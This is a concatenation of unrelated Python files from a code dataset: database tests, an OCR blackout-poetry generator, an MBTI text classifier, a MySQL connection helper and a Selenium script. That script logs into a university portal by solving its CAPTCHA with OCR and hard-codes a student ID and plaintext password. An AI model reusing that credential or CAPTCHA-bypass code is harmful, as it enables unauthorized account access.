return comment
| StarcoderdataPython |
92746 | <gh_stars>1-10
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from datetime import datetime
from unittest import mock
import pytest
from spotrix.db_engine_specs.firebird import FirebirdEngineSpec
grain_expressions = {
None: "timestamp_column",
"PT1S": (
"CAST(CAST(timestamp_column AS DATE) "
"|| ' ' "
"|| EXTRACT(HOUR FROM timestamp_column) "
"|| ':' "
"|| EXTRACT(MINUTE FROM timestamp_column) "
"|| ':' "
"|| FLOOR(EXTRACT(SECOND FROM timestamp_column)) AS TIMESTAMP)"
),
"PT1M": (
"CAST(CAST(timestamp_column AS DATE) "
"|| ' ' "
"|| EXTRACT(HOUR FROM timestamp_column) "
"|| ':' "
"|| EXTRACT(MINUTE FROM timestamp_column) "
"|| ':00' AS TIMESTAMP)"
),
"P1D": "CAST(timestamp_column AS DATE)",
"P1M": (
"CAST(EXTRACT(YEAR FROM timestamp_column) "
"|| '-' "
"|| EXTRACT(MONTH FROM timestamp_column) "
"|| '-01' AS DATE)"
),
"P1Y": "CAST(EXTRACT(YEAR FROM timestamp_column) || '-01-01' AS DATE)",
}
@pytest.mark.parametrize("grain,expected", grain_expressions.items())
def test_time_grain_expressions(grain, expected):
assert (
FirebirdEngineSpec._time_grain_expressions[grain].format(col="timestamp_column")
== expected
)
def test_epoch_to_dttm():
assert (
FirebirdEngineSpec.epoch_to_dttm().format(col="timestamp_column")
== "DATEADD(second, timestamp_column, CAST('00:00:00' AS TIMESTAMP))"
)
def test_convert_dttm():
dttm = datetime(2021, 1, 1)
assert (
FirebirdEngineSpec.convert_dttm("timestamp", dttm)
== "CAST('2021-01-01 00:00:00' AS TIMESTAMP)"
)
assert (
FirebirdEngineSpec.convert_dttm("TIMESTAMP", dttm)
== "CAST('2021-01-01 00:00:00' AS TIMESTAMP)"
)
assert FirebirdEngineSpec.convert_dttm("TIME", dttm) == "CAST('00:00:00' AS TIME)"
assert FirebirdEngineSpec.convert_dttm("DATE", dttm) == "CAST('2021-01-01' AS DATE)"
assert FirebirdEngineSpec.convert_dttm("STRING", dttm) is None
| StarcoderdataPython |
1701293 | <reponame>Tachyu/PythonCodes
#encoding:utf-8
import re
import string
import sys
import os
import io
import urllib
import urllib2
import cookielib
import requests
import getpass
import pytesser
from lxml import etree
from pytesser import *
import lxml.html.soupparser as soupparser
import splinter
import time
import random
import selenium
import shutil
from selenium import webdriver
from splinter import browser
reload(sys)
sys.setdefaultencoding('utf-8')
#登陆页面
loginpage = r"http://172.16.58.3/"
vrifycodeUrl = "http://172.16.58.3/validateCodeAction.do?"
# 0.登陆
# 1.课程表
# 2.成绩
# 3.个人信息
# 4.可用教室
# 5.选课
# 6.评教
my_class_xp = r'本学期课表' #1
iedriver = "E:\IEDriverServer.exe"
os.environ["webdriver.ie.driver"] = iedriver
driver = webdriver.Ie(iedriver)
if len(sys.argv) == 1:
print u'''
# 0.登陆\n
# 1.课程表\n
# 2.成绩\n
# 3.个人信息\n
# 4.可用教室\n
# 5.选课\n
# 6.评教\n
'''
student_id = raw_input("ID: ")
passWord = <PASSWORD>("password: ")
choice = int(raw_input("choice: "))
elif len(sys.argv) == 2:
student_id = '14281023'
passWord = '<PASSWORD>'
choice = int(sys.argv[1])
elif len(sys.argv) == 4:
student_id = sys.argv[1]
passWord = sys.argv[2]
choice = int(sys.argv[3])
#创建临时目录
try:
os.mkdir('temp')
except:
pass
#识别错误的验证码图片
error_image = Image.new("RGB", [100,100], (255,255,255))
def getCode(rand_code):
global error_image
global error_time
#验证码
v_yzm = ''
#列出目录下的文件,获取截图文件
files = os.listdir('temp')
picName = u'temp/'
for f in files:
if f.find('urp_'+ str(ran_code)) != -1:
picName += f.decode('gbk')
break
im = Image.open(picName)
#裁切图片
region = (318,288,398,308)
cropImg = im.crop(region)
bg = Image.new("RGB", cropImg.size, (255,255,255))
bg.paste(cropImg,cropImg)
bg = bg.convert('L')
#阈值化
threshold = 150
table = []
for i in range(256):
if i < threshold:
table.append(0)
else:
table.append(1)
bg = bg.point(table, '1')
bg.show()
v_yzm =image_to_string(bg)
# print 'raw:' + v_yzm
v_yzm = v_yzm.replace('NN','W')
v_yzm = v_yzm.replace('?','f')
v_yzm = v_yzm.replace('|','l')
v_yzm = v_yzm.replace('_','')
pattern = re.compile('\W')
v_yzm = re.sub(pattern,'',v_yzm)
if len(v_yzm) == 4:
return v_yzm
else:
bg.save(r'errorReport/' +v_yzm + r'_s1.jpg')
return ''
try_time = 0
while True and try_time < 10:
driver.get(loginpage)
driver.find_element_by_name('zjh').send_keys("14281023")
driver.find_element_by_name('mm').send_keys('zmy10086')
v_yzm = ''
yzm_trytime = 0
while len(v_yzm) != 4 and yzm_trytime < 5:
if yzm_trytime != 0:
driver.find_element_by_tag_name('a').click()
time.sleep(0.1)
ran_code = random.random()
driver.save_screenshot('E:\\Python Sourse File\\temp\\urp_' + str(ran_code) + '.jpg')
v_yzm = getCode(ran_code)
yzm_trytime += 1
driver.find_element_by_xpath('/html/body/table/tbody/tr/td/table[3]/tbody/tr/td[2]/form/table/tbody/tr[2]/td/table/tbody/tr[3]/td[2]/input').send_keys(v_yzm)
driver.find_element_by_id('btnSure').click()
# time.sleep(0.2)
try:
print v_yzm
driver.find_element_by_id('btnSure').click()
except Exception as e:
print 'Success!'
break
error_image.save(r'errorReport/' + v_yzm + r'_s2.jpg')
try_time += 1
# driver.get(url_dic[choice])
# driver.find_element_by_name(url_dic[choice])
time.sleep(1)
my_class_url = r'http://121.194.57.131/xskbAction.do?actionType=1' #1
list_wj_url = r'http://172.16.58.3/jxpgXsAction.do?oper=listWj' #6
driver.get(my_class_url)
driver.switch_to_alert().dismiss()
#删除临时文件
files = os.listdir('temp')
for file in files:
try:
targetFile = os.path.join('temp', file)
if os.path.isfile(targetFile):
os.remove(targetFile)
except Exception as e:
pass
print u'删除成功' | StarcoderdataPython |
3330500 | """
Setup script for failnozzle.
"""
from setuptools import setup
if __name__ == '__main__':
setup(name='failnozzle',
version='1.0',
packages=['failnozzle'],
package_dir={'failnozzle': 'failnozzle'},
install_requires=['gevent', 'Jinja2'],
package_data={'failnozzle': ['*.txt']})
| StarcoderdataPython |
1633848 | import os
import random
from statistics import mean
import string
import uuid
import sys
import tracery
import spacy
import pyocr
import pyocr.builders
from PIL import Image, ImageDraw, ImageFilter
BOUND_PADDING = 50
BOX_PADDING = 50 # 10
WOBBLE_MAX = 2
nlp = spacy.load('en')
def draw_vertical_lines(draw, boxes, doc_bounding_box, line_width):
line_weight_factor = random.triangular(0.005, 1.2)
current_x = doc_bounding_box[0] - line_width / 2
color = get_color()
while current_x < doc_bounding_box[2]:
start_x = current_x
start_y = doc_bounding_box[1] - line_width / 2
end_x = start_x
end_y = doc_bounding_box[3] - line_width / 2
bx0 = start_x
bx1 = start_x + line_width
select_boxes = []
for box in boxes:
wx0 = box.position[0][0] - BOUND_PADDING
wx1 = box.position[1][0] + BOUND_PADDING
if bx0 < wx0 and wx1 < bx1 or \
wx0 < bx1 and bx1 < wx1 or \
wx0 < bx0 and bx0 < wx1:
select_boxes.append(box)
if select_boxes:
y0 = start_y
y1 = end_y
for box in select_boxes:
y1 = box.position[0][1] - BOX_PADDING
draw_line(draw, [start_x, y0, end_x, y1], line_width=line_width, color=color,
line_weight_factor=line_weight_factor, dir='v')
y0 = box.position[1][1] + BOX_PADDING
draw_line(draw, [start_x, y0, end_x, end_y], line_width=line_width, color=color,
line_weight_factor=line_weight_factor, dir='v')
else:
draw_line(draw, [start_x, start_y, end_x, end_y], line_width=line_width, color=color,
line_weight_factor=line_weight_factor, dir='v')
current_x = start_x + line_width
def get_color():
if random.randint(0, 100) == 0:
color = (179, 27, 27)
else:
color = (int(random.triangular(0, 10, 1)),
int(random.triangular(0, 10, 1)),
int(random.triangular(0, 10, 1)),
)
return color
def draw_horizontal_lines(draw, boxes, doc_bounding_box, line_width):
"""Draw black horizontal lines across the page _except_ for that word"""
line_weight_factor = random.triangular(0.005, 1.2)
color = get_color()
start_x = doc_bounding_box[0]
current_y = doc_bounding_box[1]
end_x = doc_bounding_box[2]
end_y = doc_bounding_box[3] - line_width / 2
while current_y < doc_bounding_box[3]:
by0 = current_y
by1 = current_y + line_width
select_boxes = []
for box in boxes:
wy0 = box.position[0][1]
wy1 = box.position[1][1]
if by0 <= wy0 and wy1 <= by1 or \
wy0 <= by1 and by1 <= wy1 or \
wy0 <= by0 and by0 <= wy1:
select_boxes.append(box)
if select_boxes:
x0 = start_x
x1 = end_x
for box in select_boxes:
x1 = box.position[0][0] - BOX_PADDING
draw_line(draw, [x0, current_y, x1, current_y],
line_width=line_width,
line_weight_factor=line_weight_factor, color=color,
dir="h")
x0 = box.position[1][0] + BOX_PADDING
draw_line(draw, [x0 + BOX_PADDING, current_y, end_x, current_y],
line_width=line_width, line_weight_factor=line_weight_factor, dir="h", color=color)
else:
draw_line(draw, [start_x, current_y, end_x, current_y],
line_width=line_width, color=color,
line_weight_factor=line_weight_factor,
dir="h")
current_y = by1
def draw_line(draw, pos, line_width, dir="h", color=(0, 0, 0), line_weight_factor=1):
# Draw a fuzzy line of randomish width repeat times
repeat = random.randint(10, 20)
width = int(line_width) * line_weight_factor
default_padding = line_width / 3
margin_extent = 20 # random.randint(1, 20)
# Slide the center of the line down width/2 based on dir
if dir == 'h':
pos[1] += width / 2
pos[3] += width / 2
# Introduce some randomness into the margins
pos[0] -= random.triangular(width / margin_extent, width * margin_extent)
pos[2] += random.triangular(width / margin_extent, width * margin_extent)
else:
pos[0] -= width / 2
pos[2] -= width / 2
# Introduce some randomness into the margins
pos[1] -= random.triangular(width / margin_extent, width * margin_extent)
pos[3] += random.triangular(width / margin_extent, width * margin_extent)
for i in range(0, repeat):
width = int(random.uniform(line_width - default_padding, line_width))
padding = default_padding * 4
pos[0] = random.triangular(pos[0] - padding, pos[0] + padding)
pos[1] = random.triangular(pos[1] - padding, pos[1] + padding)
pos[2] = random.triangular(pos[2] - padding, pos[2] + padding)
pos[3] = random.triangular(pos[3] - padding, pos[3] + padding)
opacity = 240 + i
width_factor = random.triangular(1, 10, 1)
draw.line(pos, width=int(width / width_factor), fill=(*color, opacity))
def get_boxes(imagefile, tool):
num_words = 5
boxes = tool.image_to_string(
Image.open(imagefile), lang="eng",
builder=pyocr.builders.WordBoxBuilder()
)
return boxes
def image_filter(img):
for i in range(10):
img = img.filter(ImageFilter.SMOOTH_MORE)
return img
def parse_words(boxes):
words = []
for box in boxes:
word = box.content.strip()
word = word.translate(str.maketrans({a:None for a in string.punctuation}))
words.append({'text': word, 'box': box})
sent = ' '.join([w['box'].content for w in words])
doc = nlp(sent)
for token in doc:
for word in words:
text = word['text']
if token.text == text:
word['token'] = token
word['pos'] = token.pos_
return words
def find_boxes_for_grammar(boxes):
words = parse_words(boxes)
grammars = [
['DET', 'NOUN', 'VERB', 'NOUN'],
['ADJ', 'NOUN', 'VERB', 'NOUN'],
['ADJ', 'NOUN', 'VERB', 'ADV'],
['DET', 'NOUN', 'VERB', 'NOUN', 'CONJ', 'NOUN'],
['VERB', 'DET', 'NOUN'],
['ADV', 'VERB', 'NOUN', 'CONJ', 'NOUN']
]
grammar = random.choice(grammars)
picks = []
word_index = 0
prev_word = None
prev_pos = None
for pos in grammar:
while True:
word = words[word_index]
if len(picks) > 0:
prev_word = picks[-1]
prev_pos = prev_word['pos']
pick_this = True
if prev_pos == 'DET':
if prev_word['text'] == 'a' or prev_word['text'] == 'an':
# Pick this if it's singular
pick_this = not is_plural(word)
if prev_word['text'] == 'a':
# Pick this if it doesn't start with a vowel
pick_this = not starts_with_vowel(word) and pick_this
if prev_word['text'] == 'an':
pick_this = starts_with_vowel(word) and pick_this
if prev_word['text'] == 'this':
pick_this = not is_plural(word) and pick_this
if prev_word['text'] == 'these':
pick_this = is_plural(word) and pick_this
if prev_pos == 'NOUN':
# If the previous noun was plural, the verb must be plural
if is_plural(prev_word):
pick_this = is_plural_verb(word) and pick_this
if not is_plural(prev_word):
pick_this = not is_plural_verb(word) and pick_this
if prev_pos == 'VERB':
# If the verb was plural, the noun must be
if is_plural_verb(prev_word):
pick_this = is_plural(word) and pick_this
if not is_plural_verb(prev_word):
pick_this = not is_plural(word) and pick_this
if pos == 'VERB':
# Don't pick auxilliary verbs as they won't have a helper
if 'token' in word:
pick_this = word['token'].dep_ != 'aux' and pick_this
if 'pos' in word and word['pos'] == pos and pick_this and random.randint(0, 30) == 0:
#print("Picking ", word['text'], " ", word['token'].dep_)
picks.append(word)
prev_pos = pos
word_index += 1
break
word_index += 1
return [p['box'] for p in picks]
def is_plural(word):
if word['text'] == 'men' or word['text'] == 'women': # Special case this since one comes up a lot
return True
return word['text'][-1] == 's'
def is_plural_verb(word):
if word['text'] == 'have':
return True
return word['text'][-1] != 's'
def is_present(word):
return word['text'][-1] == 's'
def starts_with_vowel(word):
vowels = set(['a', 'e', 'i', 'o', 'u'])
return word['text'][0] in vowels
def setup(imagefile):
tool = pyocr.get_available_tools()[0]
boxes = get_boxes(imagefile, tool)
return boxes
def draw(imagefile, boxes):
while True:
try:
select_boxes = find_boxes_for_grammar(boxes)
break
except IndexError:
#print("Retrying...")
pass
# Get the line height by taking the average of all the box heights
box_heights = []
margin_lefts = []
margin_rights = []
margin_top = boxes[0].position[0][1]
margin_bottom = boxes[-1].position[1][1]
for box in boxes:
margin_lefts.append(box.position[0][0])
margin_rights.append(box.position[1][0])
box_heights.append(box.position[1][1] - box.position[0][1])
margin_left = min(margin_lefts)
margin_right = max(margin_rights)
line_width = mean(box_heights)
line_spaces = [0]
last_y_pos = boxes[0].position[1][1]
src = Image.open(imagefile)
src = src.convert('RGBA')
img = Image.new('RGBA', (src.size[0], src.size[1]))
draw = ImageDraw.Draw(img)
doc_bounding_box = (margin_left, margin_top, margin_right, margin_bottom)
line_choices = random.choice(('v', 'h', 'a'))
line_choices = 'v'
if line_choices == 'v':
draw_vertical_lines(draw, select_boxes, doc_bounding_box=doc_bounding_box, line_width=line_width)
elif line_choices == 'h':
draw_horizontal_lines(draw, select_boxes,
doc_bounding_box=doc_bounding_box,
line_width=line_width)
else:
draw_vertical_lines(draw, select_boxes, doc_bounding_box=doc_bounding_box, line_width=line_width)
draw_horizontal_lines(draw, select_boxes,
doc_bounding_box=doc_bounding_box,
line_width=line_width)
img = image_filter(img)
out = Image.alpha_composite(src, img)
repeat = 10
f = 10
for box in select_boxes:
pad = BOX_PADDING
d = ImageDraw.Draw(out)
p0 = [box.position[0][0] - pad, box.position[0][1] - pad]
p1 = [box.position[1][0] + pad, box.position[0][1] - pad]
p2 = [box.position[1][0] + pad, box.position[1][1] + pad]
p3 = [box.position[0][0] - pad, box.position[1][1] + pad]
b = (*p0, *p2)
crop = src.crop(box=b)
out.paste(crop, box=b)
w = 10 + int(random.uniform(-5, 5))
for i in range(0, repeat):
fuzz = random.uniform(-f, f)
p0 = [p + fuzz for p in p0]
fuzz = random.uniform(-f, f)
p1 = [p + fuzz for p in p1]
fuzz = random.uniform(-f, f)
p2 = [p + fuzz for p in p2]
fuzz = random.uniform(-f, f)
p3 = [p + fuzz for p in p3]
fuzz = random.uniform(-f, f)
d.line(p0 + p1, width=w, fill="black")
d.line(p1 + p2, width=w, fill="black")
d.line(p2 + p3, width=w, fill="black")
d.line(p3 + p0, width=w, fill="black")
final = Image.new('RGBA', (src.size[0], src.size[1]))
canvas = ImageDraw.Draw(final)
canvas.rectangle([0, 0, final.size[0], final.size[1]], fill='white')
final = Image.alpha_composite(final, out)
outfile = str(uuid.uuid4())[0:5] + '.png' # os.path.basename(imagefile)
final.save("build/" + outfile)
if __name__ == '__main__':
path = sys.argv[1]
pages = []
for f in os.listdir(path):
pages.append(f)
num_generations_per_page = 100
while True:
f = random.choice(pages)
imagefile = os.path.join(path, f)
print("Procesing " + imagefile)
boxes = setup(imagefile)
for i in range(0, num_generations_per_page):
draw(imagefile, boxes)
| StarcoderdataPython |
3260238 | <reponame>repasics/js-test-generators
#!/usr/bin/env python
from os import path
SCRIPTS_DIR = path.dirname(path.abspath(__file__))
TEMPLATE_DIR = path.normpath(path.join(SCRIPTS_DIR, 'templates'))
PROJECT_DIR = path.normpath(path.join(SCRIPTS_DIR, '..', '..'))
NUMBER_DIR = path.normpath(path.join(PROJECT_DIR, 'src', 'number'))
class file_write_settings():
def __init__(self, generated_filename, output_dir, file_header, test_cases_in_a_file):
self.generated_filename = generated_filename # The template of the generated filename
self.output_dir = output_dir # The output directory
self.file_header = file_header # The header of the test files
self.test_cases_in_a_file = test_cases_in_a_file # The number of test cases for each file
| StarcoderdataPython |
3344234 | <gh_stars>0
"""
use the trained model to predict personality
"""
import pickle as pkl
import re
import numpy as np
from nltk import WordNetLemmatizer
from nltk.corpus import stopwords
from numpy import ndarray
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.svm import SVC
# init important variables
from xgboost import XGBClassifier
personality_types = ['IE', 'NS', 'FT', 'JP']
models = []
useless_words = stopwords.words("english")
unique_type_list = ['INFJ', 'ENTP', 'INTP', 'INTJ', 'ENTJ', 'ENFJ', 'INFP', 'ENFP',
'ISFP', 'ISTP', 'ISFJ', 'ISTJ', 'ESTP', 'ESFP', 'ESTJ', 'ESFJ']
unique_type_list = [x.lower() for x in unique_type_list]
# load the models etc.
cntizer: CountVectorizer
tfizer: TfidfTransformer
lemmatizer: WordNetLemmatizer
with open('model/cntizer.pkl', 'rb') as f:
cntizer = pkl.load(f)
with open('model/tfizer.pkl', 'rb') as f:
tfizer = pkl.load(f)
with open('model/lemmatizer.pkl', 'rb') as f:
lemmatizer = pkl.load(f)
for name in personality_types:
with open(f'model/{name}.pkl', 'rb') as f:
models.append(pkl.load(f))
# pre processing methods
# Splitting the MBTI personality into 4 letters and binarizing it
b_Pers = {'I': 0, 'E': 1, 'N': 0, 'S': 1, 'F': 0, 'T': 1, 'J': 0, 'P': 1}
b_Pers_list = [{0: 'I', 1: 'E'}, {0: 'N', 1: 'S'}, {0: 'F', 1: 'T'}, {0: 'J', 1: 'P'}]
def translate_personality(personality):
# transform mbti to binary vector
return [b_Pers[l] for l in personality]
# To show result output for personality prediction
def translate_back(personality):
# transform binary vector to mbti personality
s = ''
for i, l in enumerate(personality):
s += b_Pers_list[i][l]
return s
def pre_process_text(data: list, remove_stop_words=True, remove_mbti_profiles=True) -> ndarray:
list_posts = []
for posts in data:
# Remove url links
temp = re.sub('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', ' ', posts)
# Remove Non-words - keep only words
temp = re.sub("[^a-zA-Z]", " ", temp)
# Remove spaces > 1
temp = re.sub(' +', ' ', temp).lower()
# Remove multiple letter repeating words
temp = re.sub(r'([a-z])\1{2,}[\s|\w]*', '', temp)
# Remove stop words
if remove_stop_words:
temp = " ".join([lemmatizer.lemmatize(w) for w in temp.split(' ') if w not in useless_words])
else:
temp = " ".join([lemmatizer.lemmatize(w) for w in temp.split(' ')])
# Remove MBTI personality words from posts
if remove_mbti_profiles:
for t in unique_type_list:
temp = temp.replace(t, '')
# the cleaned data temp is passed here
list_posts.append(temp)
return np.array(list_posts)
def predict(my_posts: list) -> str:
my_posts = pre_process_text(my_posts, remove_stop_words=True, remove_mbti_profiles=True)
my_X_cnt = cntizer.transform(my_posts)
my_X_tfidf = tfizer.transform(my_X_cnt).toarray()
results = []
for model in models:
results.append(round(model.predict(my_X_tfidf).mean(), 0))
return translate_back(results)
if __name__ == '__main__':
while True:
print('>> ' + predict(input('<< ').split('|||')))
| StarcoderdataPython |
4822470 | #!/usr/bin/env python3
from lark import Lark
program = open('program.txt').read()
rule = open('sip.lark').read()
# 文法規則をパーサジェネレータに渡してパーサを生成(字句解析もやってくれる)
parser = Lark(rule, start='generic_message', parser='lalr')
# プログラムを字句解析&構文解析
tree = parser.parse(program)
print(tree.pretty())
| StarcoderdataPython |
100690 | import logging
from getpass import getpass
import keyring
from mysql import connector
from mysql.connector.errors import ProgrammingError
log = logging.getLogger(__name__)
class CursorProvider:
instance = None
@classmethod
def get(cls):
if CursorProvider.instance is None:
raise AttributeError('Trying to get instance before instantiating, call {} from {}.{} beforehand'
.format(CursorProvider.init.__name__, __name__, cls.__name__))
return CursorProvider.instance.connection.cursor()
@staticmethod
def init(host, user, port=None, database=None, ask_password=False, store_password=False):
CursorProvider.instance = CursorProvider.__CursorProvider(host, user, port, database, ask_password,
store_password)
class __CursorProvider:
def __init__(self, host, user, port=None, database=None, ask_password=False, store_password=False):
port = port if port is not None else 3306
log.debug('Trying to connect to the database %s@%s:%s/%s', user, host, port, database)
service = 'mysql-tracer/{host}'.format(host=host)
if ask_password:
self.connect_with_retry(host, port, user, database, service, store_password)
else:
log.debug('Retrieving password from keyring (%s@%s)', user, service)
keyring_password = keyring.get_password(service, user)
if keyring_password is not None:
self.connection = connector.connect(host=host, port=port, user=user, db=database,
password=keyring_password)
else:
log.info('Did not find password in keyring, asking for password...')
self.connect_with_retry(host, port, user, database, service, store_password)
log.info('Connected to database with success')
def connect_with_retry(self, host, port, user, database, service, store_password, retry=2):
password = getpass('Password for {user}@{host}: '.format(user=user, host=host))
try:
self.connection = connector.connect(host=host, port=port, user=user, db=database, password=password)
except ProgrammingError as error:
if error.errno == 1045 and retry > 0:
log.warning('Access Denied, retrying...')
self.connect_with_retry(host, port, user, database, service, store_password, retry=retry - 1)
else:
raise error
if store_password:
log.info('Storing password into keyring (%s@%s)', user, service)
keyring.set_password(service, user, password)
def __del__(self):
if hasattr(self, 'connection') and self.connection.is_connected():
log.info('Closing connection to database')
self.connection.close()
| StarcoderdataPython |
1648197 | <filename>kernfab/start.py
"""
Module for starting kernel VM(s)
"""
from kernfab import config, network, qemu
def start(base_image: bool = False) -> None:
"""
Start kernel
"""
network.start()
if base_image:
vm_image = config.qemu_get_base_image()
vm_id = 0
qemu.run_vm(vm_image, vm_id)
else:
for vm_id in range(config.NUM_VMS):
vm_image = config.qemu_get_vm_image(vm_id)
qemu.run_vm(vm_image, vm_id)
| StarcoderdataPython |
4827373 | """
and
or
not
&&
||
!=
==
>=
<=
True
False
"""
result = 5 == 5
print("\n", result) | StarcoderdataPython |
1785041 | <reponame>Likitha-Seeram/Naive-Bayes-Text-Classification
import os, glob
path = '20_newsgroups' #path of the dataset
folders = os.listdir(path) #list of folders present in the dataset
#Function to check the probability of a file for a praticular place.
#It takes list of words in a file, dictionary of that class to check and index
#of that class in folders list and outputs sum of probabilities of all the words
def CheckProbability(testWords, bag, number):
size = sizes[number] #Taking the size of the dictionary
p = 0
for t in testWords:
weightage = bag_of_words[f].get(t, 0) #count of the word in a class dictionary
check = total_words.get(t, 0) #count of the word in teh entire vocabulary
probability = ((weightage+1)/(size+total)) #Probability calculation
if check != 0: #If the word is present in vocabulary, add the probability
p = p + probability
return p
#Function to do data cleaning.
#Removing all special symbols and stop words that are not useful in classification
def clean(fileData):
fileData = fileData.replace('\n', ' ') #Removing next line
fileData = fileData.lower() #Lower case all the data
fileData = fileData.translate({ord(z): None for z in '0123456789'}) #Removing digits from the data
removeList = ['<','>','?','.','"',')','(','|','-','_','#','*','+','"','$']
replaceList = ["'",'!','/','=',',',':','\\']
stopWords = ['a', 'about', 'above', 'after', 'again', 'against', 'aint', 'all', 'am', 'an', 'and', 'any', 'are', 'arent',
'aren', 'isn', 'as', 'at', 'be', 'because', 'been', 'before', 'being', 'below', 'between', 'both', 'but', 'by',
'can', 'couldn', 'couldnt', 'could', 'd', 'did', 'didnt', 'didn', 'do', 'does', 'doesnt', 'doesn', 'doing',
'dont', 'down', 'during', 'each', 'few', 'for', 'from', 'further', 'had', 'hadnt', 'has', 'hasnt', 'have', 'shan',
'havent', 'having', 'he', 'her', 'here', 'hers', 'herself', 'him', 'himself', 'his', 'how', 'i', 'if', 'in',
'into', 'is', 'isnt', 'it', 'its', 'don', 'itself', 'just', 'll', 'm', 'ma', 'me', 'mightnt', 'more', 'most',
'mustnt', 'my', 'myself', 'neednt', 'needn' 'no', 'nor', 'not', 'now', 'o', 'of', 'off', 'on', 'once', 'only',
'or', 'other', 'our', 'ours', 'b', 'r', 'w', 'ourselves', 'out', 'over', 'own', 're', 's', 'same', 'shant',
'she', 'should', 'shouldnt', 'so', 'shan', 'hadn', 'hasn', 'haven', 'wouldn', 'also', 'mightn', 'ain', 'wasn',
'some', 'such', 't', 'than', 'that', 'the', 'their', 'theirs', 'them', 'themselves', 'then', 'there', 'weren',
'these', 'they', 'this', 'those', 'through', 'to', 'too', 'under', 'until', 'up', 've', 'very', 'was',
'wasnt', 'we', 'were', 'werent', 'what', 'when', 'where', 'which', 'while', 'who', 'x', 'c', 'whom', 'why',
'will', 'with', 'won', 'wont', 'wouldnt', 'y', 'you', 'your', 'yours', 'yourself', 'yourselves', 'would', 'gmt',
'xref', 'us', 'one', 'two', 'like', 'know', 'lines', 'messageid', 'mustn', 'shouldn']
for x in removeList:
fileData = fileData.replace(x,'')
for x in replaceList:
fileData = fileData.replace(x,' ')
fileData = [word for word in fileData.split() if word not in stopWords]
return fileData
#Dictionaries for training and testing sets
bag_of_words = {}
total_words = {}
testing_files = {}
print ("Building bag of words ...")
#Building class dictionary and total dictionary (vocabulary) for the first 500 files in each folder
#Taking the remaining files in every folder for testing
for f1 in folders:
temp = {}
files = glob.glob(os.path.join(path, f1, '*'))
for f2 in files[:500]:
with open(f2) as f:
data = clean(f.read())
#For each word in a file, check if it exits in the dictionary. If yes, increment the counter. Else add the word
for w in data:
count_in_bag = temp.get(w, 0)
count_in_total = total_words.get(w, 0)
if count_in_bag == 0:
temp[w] = 1
else:
temp[w] = count_in_bag + 1
if count_in_total == 0:
total_words[w] = 1
else:
total_words[w] = count_in_total + 1
bag_of_words[f1] = temp
testing_files[f1] = files[500:]
total = len(total_words) #Length of the vocabulary
print (total, 'is the Length of Training set')
sizes = [] #List to keep track of total words in each class's dictionary
for f in folders:
sizes.append(sum(bag_of_words[f].values()))
print ("Testing ...")
success = 0 #To keep track of number of successes while testing files
count = 0 #To know the number of test files
#Testing the files
for folder in folders:
for testFile in testing_files[folder]:
count = count + 1
with open(testFile) as file:
data = clean(file.read())
prob = []
#Check the probability of each file for every class. Taking the maximum probability class as required answer.
for f in folders:
prob.append(CheckProbability(data, bag_of_words[f], list(bag_of_words.keys()).index(f)))
#If derived class macthes the file's original class, then increment success
if folders[prob.index(max(prob))] == folder:
success = success + 1
Accuracy = success / count #Calculating accuracy
print ("Accuracy of the classification is", Accuracy*100) | StarcoderdataPython |
3354418 | from traits.api import HasTraits, Directory, Bool
import traits.api as traits
from ....base import MetaWorkflow, load_config, register_workflow
from wip_diffusion import config as pconfig
"""
Part 1: MetaWorkflow
"""
mwf = MetaWorkflow()
mwf.help = """
Diffusion tracking workflow
===========================
"""
mwf.uuid = 'fda82554a43511e1b507001e4fb1404c'
mwf.tags = ['diffusion','dti','tracking']
mwf.script_dir = 'fmri'
"""
Part 2: Config
"""
class config(HasTraits):
uuid = traits.Str(desc="UUID")
desc = traits.Str(desc='Workflow description')
# Directories
working_dir = Directory(mandatory=True, desc="Location of the Nipype working directory")
sink_dir = Directory(mandatory=True, desc="Location where the BIP will store the results")
crash_dir = Directory(mandatory=False, desc="Location to store crash files")
# Execution
run_using_plugin = Bool(False, usedefault=True, desc="True to run pipeline with plugin, False to run serially")
plugin = traits.Enum("PBS", "PBSGraph","MultiProc", "SGE", "Condor",
usedefault=True,
desc="plugin to use, if run_using_plugin=True")
plugin_args = traits.Dict({"qsub_args": "-q many"},
usedefault=True, desc='Plugin arguments.')
test_mode = Bool(False, mandatory=False, usedefault=True,
desc='Affects whether where and if the workflow keeps its \
intermediary files. True to keep intermediary files. ')
# Subjects
subjects= traits.List(traits.Str, mandatory=True, usedefault=True,
desc="Subject id's. Note: These MUST match the subject id's in the \
Freesurfer directory. For simplicity, the subject id's should \
also match with the location of individual functional files.")
# Preprocessing info
preproc_config = traits.File(desc="preproc json file")
#Advanced
use_advanced_options = traits.Bool()
advanced_script = traits.Code()
save_script_only = traits.Bool(False)
def create_config():
c = config()
c.uuid = mwf.uuid
c.desc = mwf.help
return c
mwf.config_ui = create_config
"""
Part 3: View
"""
def create_view():
from traitsui.api import View, Item, Group, CSVListEditor
from traitsui.menu import OKButton, CancelButton
view = View(Group(Item(name='uuid', style='readonly'),
Item(name='desc', style='readonly'),
label='Description', show_border=True),
Group(Item(name='working_dir'),
Item(name='sink_dir'),
Item(name='crash_dir'),
label='Directories', show_border=True),
Group(Item(name='run_using_plugin'),
Item(name='plugin', enabled_when="run_using_plugin"),
Item(name='plugin_args', enabled_when="run_using_plugin"),
Item(name='test_mode'),
label='Execution Options', show_border=True),
Group(Item(name='subjects', editor=CSVListEditor()),
label='Subjects', show_border=True),
Group(Item(name='preproc_config'),
label='Track', show_border=True),
Group(Item("use_advanced_options"),
Item("advanced_script"),
label="Advanced",show_border=True),
buttons = [OKButton, CancelButton],
resizable=True,
width=1050)
return view
mwf.config_view = create_view
"""
Part 4: Construct Workflow
"""
from ..scripts.diffusion_base import create_workflow
def get_dataflow(c):
import nipype.pipeline.engine as pe
import nipype.interfaces.io as nio
datasource = pe.Node(interface=nio.DataGrabber(infields=['subject_id'],
